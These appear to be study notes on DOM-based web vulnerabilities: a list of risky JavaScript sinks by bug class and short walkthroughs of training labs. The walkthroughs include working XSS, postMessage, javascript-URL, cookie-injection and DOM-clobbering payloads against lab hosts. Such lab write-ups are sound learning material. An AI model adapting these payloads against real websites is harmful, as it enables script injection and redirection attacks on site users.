DOM-based Vulnerabilities

Types of Sinks

For DOM-based open-redirection vulnerabilities

location
location.host
location.hostname
location.href
location.pathname
location.search
location.protocol
location.assign()
location.replace()
open()
element.srcdoc
XMLHttpRequest.open()
XMLHttpRequest.send()
jQuery.ajax()
$.ajax()

document.cookie

For DOM-based Javascript Injection

eval()
Function()
setTimeout()
setInterval()
setImmediate()
execCommand()
execScript()
msSetImmediate()
range.createContextualFragment()
crypto.generateCRMFRequest()

For DOM-based document domain manipulation

document.domain

For WebScoket-URL poisoning

WebSocket

For DOM-based link-manipulation

element.href
element.src
element.action

For DOM-based web-message manipulation

postMessage()

For DOM-based Ajax request-header manipulation

XMLHttpRequest.setRequestHeader()
XMLHttpRequest.open()
XMLHttpRequest.send()
jQuery.globalEval()
$.globalEval()

For DOM-based local file-path manipulation

FileReader.readAsArrayBuffer()
FileReader.readAsBinaryString()
FileReader.readAsDataURL()
FileReader.readAsText()
FileReader.readAsFile()
FileReader.root.getFile()

For DOM-based cient-side SQL-injection

executeSql()

For DOM-based HTML5-storage manipulation

sessionStorage.setItem()
localStorage.setItem()

For DOM-based XPath injection

document.evaluate()
element.evaluate()

For DOM-based JSON-injection vulnerabilities

JSON.parse()
jQuery.parseJSON()
$.parseJSON()

For DOM-data manipulation

script.src
script.text
script.textContent
script.innerText
element.setAttribute()
element.search
element.text
element.textContent
element.innerText
element.outerText
element.value
element.name
element.target
element.method
element.type
element.backgroundImage
element.cssText
element.codebase
document.title
document.implementation.createHTMLDocument()
history.pushState()
history.replaceState()

For DOM-based denial-of-server (DOS)

requestFileSystem()
RegExp()

Lab: DOM-based open redirection

We can see this in the web page on blog post

<a href="#" onclick="returnUrl = /url=(https?:\/\/.+)/.exec(location); location.href = returnUrl ? returnUrl[1] : &quot;/&quot;">Back to Blog</a>

This means that if there is urlparameter provided, it will go to the home page.

We just needed to redirect it back to the exploit server by requesting this URL

https://0a27000f04f43bb8801f67fd00f9009f.web-security-academy.net/post?postId=6&url=https://exploit-0ae300a8049a3b60802d6637010c0094.exploit-server.net/exploit

After which, we can see the request is being send from the target to the exploit server

When we visit the product page, we can see that the website will save a cookie to the last product that the user visited.

To solve the lab, we will just need to send this to the victim

<iframe src="https://0a4700d0032197cd800e12f6004f00dd.web-security-academy.net/product?productId=2&'><script>print()</script>" onload="if(!window.x)this.src='https://0a4700d0032197cd800e12f6004f00dd.web-security-academy.net/';window.x=1;">

Lab: DOM XSS using web messages

When viewing the home page, we can see that there is this window.addEventListenerwhich will add anything into the <div id="ads">tag.

To solve the lab, set this payload on the exploit server and sent it to the victim.

<iframe src="https://0a880090041b58c8b352bc4800750047.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

Lab: DOM XSS using web messages and a JavaScript URL

To-Do later

For this lab, we can see now they will check if the message content have http:or https:

To solve the lab, set this payload on the exploit server and send it to the victim.

<iframe src="https://0a5900b303b4899d80a7c67b00d5007e.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')">

Lab: DOM XSS using web messages and `JSON.parse`

For this lab, we can see that the data is being pass using JSON.parse. So the message that we will be sending over must be in JSON format. We also can see under the load-channel, the url will be parsed in without any checks. So we can use the payload from the previous lab to call print().

To solve the lab, set this payload on the exploit server and send it to the victim

<iframe src="https://0ac800280448929c81bccfa3003100bf.web-security-academy.net/" onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'>

Lab: Exploiting DOM clobbering to enable XSS

(To Do)

To solve the lab, send this payload in the comments

<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">

PreviousClickjacking NextCross Site Scripting (XSS)

Last updated 11 months ago

hashtagTypes of Sinks

hashtagFor DOM-based open-redirection vulnerabilities

hashtagFor DOM-based cookie-manipulation

hashtagFor DOM-based Javascript Injection

hashtagFor DOM-based document domain manipulation

hashtagFor WebScoket-URL poisoning

hashtagFor DOM-based link-manipulation

hashtagFor DOM-based web-message manipulation

hashtagFor DOM-based Ajax request-header manipulation

hashtagFor DOM-based local file-path manipulation

hashtagFor DOM-based cient-side SQL-injection

hashtagFor DOM-based HTML5-storage manipulation

hashtagFor DOM-based XPath injection

hashtagFor DOM-based JSON-injection vulnerabilities

hashtagFor DOM-data manipulation

hashtagFor DOM-based denial-of-server (DOS)

hashtagLab: DOM-based open redirection

hashtagLab: DOM-based cookie manipulation

hashtagLab: DOM XSS using web messages

hashtagLab: DOM XSS using web messages and a JavaScript URL

hashtagLab: DOM XSS using web messages and JSON.parse

hashtagLab: Exploiting DOM clobbering to enable XSS